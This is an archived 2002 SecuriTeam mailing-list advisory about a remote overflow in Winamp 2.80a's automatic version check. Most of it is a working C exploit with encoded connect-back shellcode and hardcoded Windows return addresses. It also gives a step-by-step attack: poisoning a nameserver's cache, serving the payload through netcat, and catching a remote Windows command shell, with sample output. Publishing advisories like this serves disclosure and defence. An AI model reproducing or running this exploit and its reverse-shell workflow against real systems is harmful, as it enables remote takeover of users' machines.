[EXPL] Remote Winamp Exploit (Product Updates)

From: support@securiteam.com
Date: 07/07/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Sun,  7 Jul 2002 07:57:48 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Remote Winamp Exploit (Product Updates)
------------------------------------------------------------------------

SUMMARY

Winamp includes an option, enabled by default, which checks on startup for
the latest version from http://www.winamp.com and will then notify the
user of a possible upgrade via a message box. Unfortunately, if it were to
receive a huge response, the thread parsing the data is thrown into an
infinite loop and eventually the exception dispatcher is called. Then like
most of the time, an overflow will occur.

DETAILS

Example:
Nameserver - 192.168.0.1
Attacker - 192.168.1.2
Victim (windows machine) - 192.168.0.2

1) Attacker poisons nameserver cache.

192.168.1.2:
x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2

2) Victim is now resolving www.winamp.com to attacker machine.

192.168.0.2:
C:>nslookup www.winamp.com
Server: z3.names.int
Address: 192.168.0.1

Name: www.winamp.com
Address: 192.168.1.2

3) Attacker fires up exploit as web daemon.

192.168.1.2:
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80

4) Attacker waits for connect-back by exploit.

192.168.1.2:
x@x:~$ nc -l -p 5555

5) Winamp is open on the client's side.

6) Client tries to update, causing a crash and the execution of code.

192.168.1.2:
x@x:~$ nc -l -p 5555
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:>

Exploit:
/*
wampexp.c
July 3rd, 2002

Winamp 2.80a and all previous remote exploit (connect-back styles)

        winamp has an option, enabled by default, which checks for the
latest
        version from www.winamp.com and will then notify the user of a
possible
        upgrade via a messagebox..

        unfortunately, if it were to receive a huge response via some
nameserver
        corruption the thread parsing the response is thrown into an
infinite
        loop and eventually the exception dispatcher is called.. and THEN
like
        most of the time under windows a big, bad, overflow occurs..
        
        ex: # (./wampexp 192.168.0.1 5555)|nc -l -p 80
            # nc -l -p 5555
            *poisoned user opens winamp*
            # nc -l -p 5555
            Microsoft Windows 2000 [Version 5.00.2195]
            (C) Copyright 1985-2000 Microsoft Corp.
            
            C:\>
        
sincerely, 2c79cbe14ac7d0b8472d3f129fa1df55
(c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)

yes, yahoo took away my 2! ;~~~
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
#include <unistd.h>

// a minimal HTTP header and fake version
unsigned char payload[35904] =
"\x4f\x4b\x0d\x0a\x0d\x0a\x39\x2e\x39\x39\x0d\x0a\x0d\x0a";

// a gruesome hack of dark spyrits jill.c shell that further alters the
// startupinfo structure (as this isn't a service) and calls ExitThread
// to keep things invisible..

unsigned char shell[] =
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";

main(char argc, char **argv){
int i;
        unsigned short int a_port;
        unsigned long a_host;
        struct hostent *ht;
        struct sockaddr_in sin;
        
        if (argc < 3){
        printf("Winamp 2.80a remote exploit (7/3/2002)\n");
        printf("c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com\n\n");
        printf("usage: %s <localhost> <localport>\n\n", argv[0]);
        printf("NOTE: target os is 2000.. probably works on all\n");
        printf("winamp versions prior to 2.80a as there are no \n");
        printf("dependancies on winamp, only the static ws2help\n\n");
        exit(-1);
}

// blatantly ripped! *TEEHEEEHHEH*
        a_port = htons(atoi(argv[2]));
        a_port ^= 0x9595;
        if ((ht = gethostbyname(argv[1])) == 0){herror(argv[1]);exit(-1);}
        a_host = *((unsigned long *)ht->h_addr);
        a_host ^= 0x95959595;
        shell[385] = ((a_port) & 0xff);
        shell[386] = ((a_port >> 8) & 0xff);
        shell[390] = ((a_host) & 0xff);
        shell[391] = ((a_host >> 8) & 0xff);
        shell[392] = ((a_host >> 16) & 0xff);
        shell[393] = ((a_host >> 24) & 0xff);
        
        strcat(payload, shell);
        
        // lots of NOPs
        for(i=792;i<9704;i++)
                strcat(payload, "\x90");

        // we land here when we jmp ebx the second time
        // this sets ebx to the start of our shell, and jmps back
        strcat(payload, "\x81\xc3\x11\x11\x11\x01\x81\xeb\x07\x37");
strcat(payload, "\x11\x01\xff\xe3");

        // lots more NOPs for lots more fun
        for(i=9718;i<35809;i++)
                strcat(payload, "\x90");
 
        // and bh, dl; jmp ebx.. this allows us to jmp back into an area
        // where we can put some real code
        strcat(payload, "\x22\xfa\xff\xe3");
        
        // our "eip" (call ecx; ntdll.dll@0x11936)
        // jmp ebx; ws2help.dll@0xdd6 (v5.0.2134.1, static on all service
packs)
        strcat(payload, "\xd6\x19\x02\x75");

// if ws2help doesn't match for some reason, use this call ebx..
// dependant on the winamp in_wm.dll plugin
//strcat(payload, "\x57\x22\x12\x01");
 
        strcat(payload, "\x0d\x0a");

printf("%s", payload);
}

ADDITIONAL INFORMATION

The information has been provided by Anonymous.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.